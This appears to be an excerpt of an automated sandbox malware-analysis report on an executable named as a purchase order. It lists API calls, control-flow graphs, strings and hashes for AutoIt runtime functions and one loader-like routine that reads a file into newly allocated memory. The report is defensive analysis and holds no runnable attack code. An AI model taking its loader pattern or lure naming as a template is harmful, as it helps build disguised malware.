                      • RegisterClassExW.USER32(00000030), ref: 00A92FB5
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A92FC6
                      • InitCommonControlsEx.COMCTL32(?), ref: 00A92FE3
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A92FF3
                      • LoadIconW.USER32(000000A9), ref: 00A93009
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A93018
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$3o
                      • API String ID: 2914291525-1794097289
                      • Opcode ID: 9caac2435c4449da80fd44e653dc33e2502d41facbff9b741d1fecea51e63188
                      • Instruction ID: 584789cb2ae79e073c8e87f28fc1e0f9257b5eb674b0cd9772254fc63eed773b
                      • Opcode Fuzzy Hash: 9caac2435c4449da80fd44e653dc33e2502d41facbff9b741d1fecea51e63188
                      • Instruction Fuzzy Hash: F021C4B5900318AFDB10DFA8E849BCEBBF4FB08701F50895AF615A72A0DBB44544CF91
                      Function 00A94257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,00000000,00000001,00000000), ref: 00A9428C
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00AB1BC7: __wcsicmp_l.LIBCMT ref: 00AB1C50
                      • _wcscpy.LIBCMT ref: 00A943C0
                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00B0214E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe$CMDLINE$CMDLINERAW
                      • API String ID: 861526374-2055046804
                      • Opcode ID: cc928510e0b26833b58018f95e1247e425c3324d40914738bfb1b3672eb32f33
                      • Instruction ID: 7ab24024dc9d33e4375585f4804edb2d9f92ac287a237e5488fe03c995ba4aab
                      • Opcode Fuzzy Hash: cc928510e0b26833b58018f95e1247e425c3324d40914738bfb1b3672eb32f33
                      • Instruction Fuzzy Hash: 01819072A00219AACF05EBE4DE56FEFBBF8AF45350F500455E501B7091EF606A09CBA1
                      Function 00ADC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 944 adc890-adc940 call ac0650 call ab010a call a94bce call adc6a0 call a941a7 call ab2203 957 adc946-adc94d call adce59 944->957 958 adc9f3-adc9fa call adce59 944->958 963 adc9fc-adc9fe 957->963 964 adc953-adc9f1 call ab297d call ab1943 call ab1914 call ab297d call ab1914 * 2 957->964 958->963 965 adca03 958->965 966 adcc53-adcc54 963->966 968 adca06-adcac2 call a9417d * 8 call add009 call ab4129 964->968 965->968 969 adcc71-adcc7f call a94fd2 966->969 1003 adcacb-adcae6 call adc6e4 968->1003 1004 adcac4-adcac6 968->1004 1007 adcaec-adcaf4 1003->1007 1008 adcb78-adcb84 call ab4274 1003->1008 1004->966 1009 adcafc 1007->1009 1010 adcaf6-adcafa 1007->1010 1015 adcb9a-adcb9e 1008->1015 1016 adcb86-adcb95 DeleteFileW 1008->1016 1012 adcb01-adcb1f call a9417d 1009->1012 1010->1012 1022 adcb49-adcb5f call adc07d call ab373e 1012->1022 1023 adcb21-adcb27 1012->1023 1018 adcc2e-adcc42 CopyFileW 1015->1018 1019 adcba4-adcc1b call add10c call add134 call adc251 1015->1019 1016->966 1020 adcc44-adcc51 DeleteFileW 1018->1020 1021 adcc56-adcc6c DeleteFileW call adcfc8 1018->1021 1019->1021 1040 adcc1d-adcc2c DeleteFileW 1019->1040 1020->966 1021->969 1037 adcb64-adcb6f 1022->1037 1027 adcb29-adcb3c call adc81a 1023->1027 1035 adcb3e-adcb47 1027->1035 1035->1022 1037->1007 1039 adcb75 1037->1039 1039->1008 1040->966
                      APIs
                        • Part of subcall function 00ADC6A0: __time64.LIBCMT ref: 00ADC6AA
                        • Part of subcall function 00A941A7: _fseek.LIBCMT ref: 00A941BF
                      • __wsplitpath.LIBCMT ref: 00ADC96F
                        • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                      • _wcscpy.LIBCMT ref: 00ADC982
                      • _wcscat.LIBCMT ref: 00ADC995
                      • __wsplitpath.LIBCMT ref: 00ADC9BA
                      • _wcscat.LIBCMT ref: 00ADC9D0
                      • _wcscat.LIBCMT ref: 00ADC9E3
                        • Part of subcall function 00ADC6E4: _memmove.LIBCMT ref: 00ADC71D
                        • Part of subcall function 00ADC6E4: _memmove.LIBCMT ref: 00ADC72C
                      • _wcscmp.LIBCMT ref: 00ADC92A
                        • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF49
                        • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF5C
                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ADCB8D
                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ADCC24
                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ADCC3A
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ADCC4B
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ADCC5D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                      • String ID:
                      • API String ID: 152968663-0
                      • Opcode ID: 357c0c811362da70994024e255b623f50b2dc5f1c96894e7e646ced2ccf9ca79
                      • Instruction ID: 1e75282781049a24de0ec1ed4eaaf98ec508ebbb2d04b3c2e4c461187aa3c42f
                      • Opcode Fuzzy Hash: 357c0c811362da70994024e255b623f50b2dc5f1c96894e7e646ced2ccf9ca79
                      • Instruction Fuzzy Hash: BCC13DB1A00129AECF10DFA5CD81EDEB7BDEF49310F5041AAF609E6251DB709A85CF61
                      Function 00AAE975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00AAEA39
                      • __wsplitpath.LIBCMT ref: 00AAEA56
                        • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                      • _wcsncat.LIBCMT ref: 00AAEA69
                      • __makepath.LIBCMT ref: 00AAEA85
                        • Part of subcall function 00AB2BFF: __wmakepath_s.LIBCMT ref: 00AB2C13
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                      • _wcscpy.LIBCMT ref: 00AAEABE
                        • Part of subcall function 00AAEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00AAEADA,?,?), ref: 00AAEB27
                      • _wcscat.LIBCMT ref: 00B032FC
                      • _wcscat.LIBCMT ref: 00B03334
                      • _wcsncpy.LIBCMT ref: 00B03370
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                      • String ID: Include$\
                      • API String ID: 1213536620-3429789819
                      • Opcode ID: 646d47f07a3bac52cc14eb5ec40f6f1073ad19e77e4f8b52290d7e14aedda659
                      • Instruction ID: df9b942c7c492a041602e724515807a1907081cb154c5bbd5e1bf1aaf36cb102
                      • Opcode Fuzzy Hash: 646d47f07a3bac52cc14eb5ec40f6f1073ad19e77e4f8b52290d7e14aedda659
                      • Instruction Fuzzy Hash: 97518FB24063409FC305EF68ED85E97B7ECFB4A301B40499EF54587261EF749644CB6A
                      Function 00A929C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1090 a929c2-a929e2 1092 a92a42-a92a44 1090->1092 1093 a929e4-a929e7 1090->1093 1092->1093 1094 a92a46 1092->1094 1095 a929e9-a929f0 1093->1095 1096 a92a48 1093->1096 1097 a92a2b-a92a33 DefWindowProcW 1094->1097 1100 a92aac-a92ab4 PostQuitMessage 1095->1100 1101 a929f6-a929fb 1095->1101 1098 b02307-b02335 call a9322e call aaec33 1096->1098 1099 a92a4e-a92a51 1096->1099 1105 a92a39-a92a3f 1097->1105 1133 b0233a-b02341 1098->1133 1106 a92a53-a92a54 1099->1106 1107 a92a76-a92a9d SetTimer RegisterWindowMessageW 1099->1107 1104 a92a72-a92a74 1100->1104 1102 a92a01-a92a03 1101->1102 1103 b0238f-b023a3 call ad57fb 1101->1103 1110 a92a09-a92a0e 1102->1110 1111 a92ab6-a92ac5 call a91e58 1102->1111 1103->1104 1127 b023a9 1103->1127 1104->1105 1114 a92a5a-a92a6d KillTimer call a92b94 call a92ac7 1106->1114 1115 b022aa-b022ad 1106->1115 1107->1104 1112 a92a9f-a92aaa CreatePopupMenu 1107->1112 1117 b02374-b0237b 1110->1117 1118 a92a14-a92a19 1110->1118 1111->1104 1112->1104 1114->1104 1121 b022e3-b02302 MoveWindow 1115->1121 1122 b022af-b022b1 1115->1122 1117->1097 1132 b02381-b0238a call acb31f 1117->1132 1125 a92a1f-a92a25 1118->1125 1126 b0235f-b0236f call ad5fdb 1118->1126 1121->1104 1129 b022d2-b022de SetFocus 1122->1129 1130 b022b3-b022b6 1122->1130 1125->1097 1125->1133 1126->1104 1127->1097 1129->1104 1130->1125 1134 b022bc-b022cd call a9322e 1130->1134 1132->1097 1133->1097 1139 b02347-b0235a call a92b94 call a93598 1133->1139 1134->1104 1139->1097
                      APIs
                      • DefWindowProcW.USER32(?,?,?,?), ref: 00A92A33
                      • KillTimer.USER32(?,00000001), ref: 00A92A5D
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A92A80
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A92A8B
                      • CreatePopupMenu.USER32 ref: 00A92A9F
                      • PostQuitMessage.USER32(00000000), ref: 00A92AAE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated
                      • API String ID: 129472671-2362178303
                      • Opcode ID: 2fd02f92c4478d9901d0924a2da68aaf474c7c9d947f3a4c07f71a51ece7fd2c
                      • Instruction ID: 97c1d5fa8d94d8e8cc1188287e86081fcae9c023495aa2ceca9a17869970faa0
                      • Opcode Fuzzy Hash: 2fd02f92c4478d9901d0924a2da68aaf474c7c9d947f3a4c07f71a51ece7fd2c
                      • Instruction Fuzzy Hash: A8415433300245BFDF34AF689D0DBBA36EAE714381F444AA6F902979E1DE749C448765
                      Function 00A930A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00A930B0
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00A930BF
                      • LoadIconW.USER32(00000063), ref: 00A930D5
                      • LoadIconW.USER32(000000A4), ref: 00A930E7
                      • LoadIconW.USER32(000000A2), ref: 00A930F9
                        • Part of subcall function 00A9318A: LoadImageW.USER32(00A90000,00000063,00000001,00000010,00000010,00000000), ref: 00A931AE
                      • RegisterClassExW.USER32(?), ref: 00A93167
                        • Part of subcall function 00A92F58: GetSysColorBrush.USER32(0000000F), ref: 00A92F8B
                        • Part of subcall function 00A92F58: RegisterClassExW.USER32(00000030), ref: 00A92FB5
                        • Part of subcall function 00A92F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A92FC6
                        • Part of subcall function 00A92F58: InitCommonControlsEx.COMCTL32(?), ref: 00A92FE3
                        • Part of subcall function 00A92F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A92FF3
                        • Part of subcall function 00A92F58: LoadIconW.USER32(000000A9), ref: 00A93009
                        • Part of subcall function 00A92F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A93018
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: 516ece55583e47f459e0e68857938d4435b66c5060f176717bd3f46249d66021
                      • Instruction ID: 729980cb3a9e1ae1ec82ffbfa08d5b2eab4796f4edb33b59b8f4141928f330d0
                      • Opcode Fuzzy Hash: 516ece55583e47f459e0e68857938d4435b66c5060f176717bd3f46249d66021
                      • Instruction Fuzzy Hash: 54215EB1E00304ABCB00DFA9EC49B9DBFF5EB48311F1489AAE204A32E0DB7449408F91
                      Function 00ABBA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1154 abba66-abba93 call ab7750 call ab8984 call ab7616 1161 abbab0-abbab5 1154->1161 1162 abba95-abbaab call abf630 1154->1162 1164 abbabb-abbac2 1161->1164 1168 abbd05-abbd0a call ab7795 1162->1168 1166 abbaf5-abbb04 GetStartupInfoW 1164->1166 1167 abbac4-abbaf3 1164->1167 1169 abbb0a-abbb0f 1166->1169 1170 abbc33-abbc39 1166->1170 1167->1164 1169->1170 1174 abbb15-abbb2c 1169->1174 1171 abbc3f-abbc50 1170->1171 1172 abbcf7-abbd03 call abbd0b 1170->1172 1175 abbc52-abbc55 1171->1175 1176 abbc65-abbc6b 1171->1176 1172->1168 1179 abbb2e-abbb30 1174->1179 1180 abbb33-abbb36 1174->1180 1175->1176 1181 abbc57-abbc60 1175->1181 1182 abbc6d-abbc70 1176->1182 1183 abbc72-abbc79 1176->1183 1179->1180 1185 abbb39-abbb3f 1180->1185 1186 abbcf1-abbcf2 1181->1186 1187 abbc7c-abbc88 GetStdHandle 1182->1187 1183->1187 1188 abbb61-abbb69 1185->1188 1189 abbb41-abbb52 call ab7616 1185->1189 1186->1170 1191 abbc8a-abbc8c 1187->1191 1192 abbccf-abbce5 1187->1192 1190 abbb6c-abbb6e 1188->1190 1198 abbb58-abbb5e 1189->1198 1199 abbbe6-abbbed 1189->1199 1190->1170 1196 abbb74-abbb79 1190->1196 1191->1192 1197 abbc8e-abbc97 GetFileType 1191->1197 1192->1186 1195 abbce7-abbcea 1192->1195 1195->1186 1200 abbb7b-abbb7e 1196->1200 1201 abbbd3-abbbe4 1196->1201 1197->1192 1202 abbc99-abbca3 1197->1202 1198->1188 1206 abbbf3-abbc01 1199->1206 1200->1201 1203 abbb80-abbb84 1200->1203 1201->1190 1204 abbcad-abbcb0 1202->1204 1205 abbca5-abbcab 1202->1205 1203->1201 1207 abbb86-abbb88 1203->1207 1209 abbcbb-abbccd InitializeCriticalSectionAndSpinCount 1204->1209 1210 abbcb2-abbcb6 1204->1210 1208 abbcb8 1205->1208 1211 abbc03-abbc25 1206->1211 1212 abbc27-abbc2e 1206->1212 1213 abbb8a-abbb96 GetFileType 1207->1213 1214 abbb98-abbbcd InitializeCriticalSectionAndSpinCount 1207->1214 1208->1209 1209->1186 1210->1208 1211->1206 1212->1185 1213->1214 1215 abbbd0 1213->1215 1214->1215 1215->1201
                      APIs
                      • __lock.LIBCMT ref: 00ABBA74
                        • Part of subcall function 00AB8984: __mtinitlocknum.LIBCMT ref: 00AB8996
                        • Part of subcall function 00AB8984: EnterCriticalSection.KERNEL32(00AB0127,?,00AB876D,0000000D), ref: 00AB89AF
                      • __calloc_crt.LIBCMT ref: 00ABBA85
                        • Part of subcall function 00AB7616: __calloc_impl.LIBCMT ref: 00AB7625
                        • Part of subcall function 00AB7616: Sleep.KERNEL32(00000000,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB763C
                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00ABBAA0
                      • GetStartupInfoW.KERNEL32(?,00B46990,00000064,00AB6B14,00B467D8,00000014), ref: 00ABBAF9
                      • __calloc_crt.LIBCMT ref: 00ABBB44
                      • GetFileType.KERNEL32(00000001), ref: 00ABBB8B
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00ABBBC4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                      • String ID:
                      • API String ID: 1426640281-0
                      • Opcode ID: 04297c494b56306caf21bab2386542c1f251482002482b87c50d7b90d5c49f54
                      • Instruction ID: 70a69582ad58ebcdb363194ce2bef5f20e5846287a86c35b4746afa129c54898
                      • Opcode Fuzzy Hash: 04297c494b56306caf21bab2386542c1f251482002482b87c50d7b90d5c49f54
                      • Instruction Fuzzy Hash: CD81B4719157458FDB14CF68C8806EDBBF8BF4A324B64425DD4A6AB3D2CBB49802CB64
                      Function 013BC558 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1216 13bc558-13bc606 call 13b9f98 1219 13bc60d-13bc633 call 13bd468 CreateFileW 1216->1219 1222 13bc63a-13bc64a 1219->1222 1223 13bc635 1219->1223 1228 13bc64c 1222->1228 1229 13bc651-13bc66b VirtualAlloc 1222->1229 1224 13bc785-13bc789 1223->1224 1226 13bc7cb-13bc7ce 1224->1226 1227 13bc78b-13bc78f 1224->1227 1230 13bc7d1-13bc7d8 1226->1230 1231 13bc79b-13bc79f 1227->1231 1232 13bc791-13bc794 1227->1232 1228->1224 1235 13bc66d 1229->1235 1236 13bc672-13bc689 ReadFile 1229->1236 1237 13bc7da-13bc7e5 1230->1237 1238 13bc82d-13bc842 1230->1238 1233 13bc7af-13bc7b3 1231->1233 1234 13bc7a1-13bc7ab 1231->1234 1232->1231 1241 13bc7c3 1233->1241 1242 13bc7b5-13bc7bf 1233->1242 1234->1233 1235->1224 1243 13bc68b 1236->1243 1244 13bc690-13bc6d0 VirtualAlloc 1236->1244 1245 13bc7e9-13bc7f5 1237->1245 1246 13bc7e7 1237->1246 1239 13bc852-13bc85a 1238->1239 1240 13bc844-13bc84f VirtualFree 1238->1240 1240->1239 1241->1226 1242->1241 1243->1224 1247 13bc6d2 1244->1247 1248 13bc6d7-13bc6f2 call 13bd6b8 1244->1248 1249 13bc809-13bc815 1245->1249 1250 13bc7f7-13bc807 1245->1250 1246->1238 1247->1224 1256 13bc6fd-13bc707 1248->1256 1251 13bc822-13bc828 1249->1251 1252 13bc817-13bc820 1249->1252 1254 13bc82b 1250->1254 1251->1254 1252->1254 1254->1230 1257 13bc73a-13bc74e call 13bd4c8 1256->1257 1258 13bc709-13bc738 call 13bd6b8 1256->1258 1264 13bc752-13bc756 1257->1264 1265 13bc750 1257->1265 1258->1256 1266 13bc758-13bc75c CloseHandle 1264->1266 1267 13bc762-13bc766 1264->1267 1265->1224 1266->1267 1268 13bc768-13bc773 VirtualFree 1267->1268 1269 13bc776-13bc77f 1267->1269 1268->1269 1269->1219 1269->1224
                      APIs
                      • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013BC629
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013BC84F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0
                      • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                      • Instruction ID: 381944fe59bc4350be537724b93ee020d48e01487bc2b687fa3f136cacf54d04
                      • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                      • Instruction Fuzzy Hash: DBA11C74E00209EFDB24CFA4C895BEEBBB5BF48319F109159E611BB681E7759A40CF50
                      Function 00AAEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1325 aaeb05-aaeb2f call a9c4cd RegOpenKeyExW 1328 b04b17-b04b2e RegQueryValueExW 1325->1328 1329 aaeb35-aaeb39 1325->1329 1330 b04b30-b04b6d call ab010a call a94bce RegQueryValueExW 1328->1330 1331 b04b91-b04b9a RegCloseKey 1328->1331 1336 b04b88-b04b90 call a94fd2 1330->1336 1337 b04b6f-b04b86 call a97e53 1330->1337 1336->1331 1337->1336
                      APIs
                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00AAEADA,?,?), ref: 00AAEB27
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00AAEADA,?,?), ref: 00B04B26
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00AAEADA,?,?), ref: 00B04B65
                      • RegCloseKey.ADVAPI32(?,?,00AAEADA,?,?), ref: 00B04B94
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: QueryValue$CloseOpen
                      • String ID: Include$Software\AutoIt v3\AutoIt
                      • API String ID: 1586453840-614718249
                      • Opcode ID: 4357785fb88f77fa6669a39f3be1c9cb2a85b21f3a71be432a7683037609aea4
                      • Instruction ID: af74244660528c4d531611bb33ce0be9abfc001986deaeb1cd36fc422f034059
                      • Opcode Fuzzy Hash: 4357785fb88f77fa6669a39f3be1c9cb2a85b21f3a71be432a7683037609aea4
                      • Instruction Fuzzy Hash: 2A113D71601118BEEF05DBA4DD9AEFE77BCEB08354F504059B506E70A1EA709E01D760
                      Function 00A92E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1352 a92e9d-a92f0d CreateWindowExW * 2 ShowWindow * 2
                      APIs
